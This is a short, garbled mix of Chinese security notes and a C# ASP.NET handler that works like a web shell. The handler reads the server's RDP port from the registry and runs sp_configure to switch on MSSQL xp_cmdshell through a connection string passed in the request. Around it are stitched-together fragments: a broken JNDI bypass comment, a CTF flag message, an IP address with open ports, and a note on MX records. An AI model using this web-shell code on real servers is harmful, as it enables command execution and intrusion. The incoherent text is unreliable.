// 装备 JNDI 默认设置部分Bypass 1.e这中特别的数值 *** 适合于MSSQL的场景。
private void ShowPort(HttpContext context) { context.Response.Write(Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp").GetValue("PortNumber").ToString()); } public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; try { var connection = context.Request.QueryString["connection"]; switch (context.Request.QueryString["method"]) { case "1": WriteVbs(context); break; case "2": ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure"); ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//敞开数据库的xp_cmdshell1) 查找可控变量,正向追寻变量传递进程,检查变量是否进行进行过滤,是否进行后台交互。
Page Content: Only admin in local network with correct password can review chat logs. But you’ve already had the flag you want,right?220.170.79.218 22 80 443 3389
PS:MX记载也叫做邮件路由记载,用户能够将该域名下的邮件服务器指向到自己的mail server上,然后即可自行控制一切的邮箱设置。